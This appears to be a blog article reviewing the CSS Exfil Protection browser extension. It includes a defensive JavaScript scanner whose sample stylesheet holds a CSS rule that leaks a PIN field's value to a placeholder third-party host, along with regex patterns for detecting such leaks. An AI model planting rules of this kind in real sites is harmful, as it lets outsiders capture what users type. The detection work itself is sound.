CSS Exfil Protection: Prevents CSS Data Leak in Firefox and Chrome

CSS Exfil Protection is an extension for the Firefox and Chrome browsers that claims to block malicious CSS code that could be used to leak your data. It blocks imported CSS or remotely linked CSS code that could be secretly capturing the data entered in various fields of a webpage.

CSS (cascading style sheets) are an integral part of webpages and cannot be fully turned off without breaking many websites. Through the CSS code, a web designer decides how the website is going to look and work. More and more websites use a CMS like WordPress or Joomla, which depend heavily on CSS and JavaScript. These websites will be crippled if you disable CSS on them.

CSS Exfil Protection

While completely turning off CSS is neither possible nor desirable, CSS Exfil Protection can selectively block attempts to load CSS code from a remote location. After installation, it monitors all the webpages that you open and scans the loaded CSS code for suspicious items. When such items are detected, it blocks them and shows the number of blocked items on the toolbar icon.
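To make "scanning the loaded CSS for suspicious items" concrete, here is an added example that is not the extension's own code: a small scanner that flags rules which pair a selector on an input's `value` attribute with a `url()` pointing off-origin. The heuristic, the function names and the `.example` hosts are assumptions made for illustration, and the sample stylesheet is constructed.

```javascript
// Added example: heuristic stylesheet scanner (assumption, not the extension's logic).
// Attribute selectors that test the value attribute, e.g. [value^="x"].
const VALUE_SELECTOR = /\[\s*value\s*(?:[\^$*~|]?=)/i;
// url(...) references that are absolute (http/https) or protocol-relative.
const REMOTE_URL = /url\(\s*['"]?\s*((?:https?:)?\/\/[^'")\s]+)/gi;

// Constructed sample stylesheet; hosts are placeholders.
const SAMPLE_CSS = `
/* constructed sample for the scanner */
body { background: url(https://cdn.example/bg.png); }
input[type="text"] { border: 1px solid #ccc; }
input[name="pin"][value^="1"] { background-image: url("https://third-party.example/log?p=1"); }
input[value$="z"] { background: url(/img/local.png); }
`;

// Returns [{ selector, hosts }] for every rule that is conditional on a
// field's value AND fetches a resource from a host other than the page's.
function scanCss(cssText, pageOrigin) {
  const pageHost = new URL(pageOrigin).host;
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments
  const findings = [];
  // Innermost "selector { declarations }" pairs; also reaches rules inside @media.
  const rule = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = rule.exec(css)) !== null) {
    const selector = m[1].trim();
    if (!VALUE_SELECTOR.test(selector)) continue; // not value-conditional
    const hosts = [...m[2].matchAll(REMOTE_URL)]
      .map((u) => new URL(u[1], pageOrigin).host)
      .filter((h) => h !== pageHost); // same-origin fetches are ignored
    if (hosts.length > 0) findings.push({ selector, hosts });
  }
  return findings;
}

console.log(scanCss(SAMPLE_CSS, "https://shop.example"));
```

Only the third rule is reported: the remote background on `body` and the local image on `input[value$="z"]` each satisfy just one half of the condition.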

This extension was created by Mike Gualtieri, and you can read more about how CSS data leaks work on his blog. He has also provided some PoC examples and a browser tester webpage. When you visit this webpage, it performs four different types of tests to see whether your web browser is protected against CSS-based data leaks.


Unfortunately, the extension does not provide any configurable options to the end user. You cannot whitelist a website to exempt its CSS from blocking. Furthermore, it assumes that remote fetching of data through CSS is malicious, which means that even harmless websites with harmless CSS are given the same treatment as possibly rogue webpages with malicious CSS code.

You can get CSS Exfil Protection extension for Firefox and Chrome from https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense.
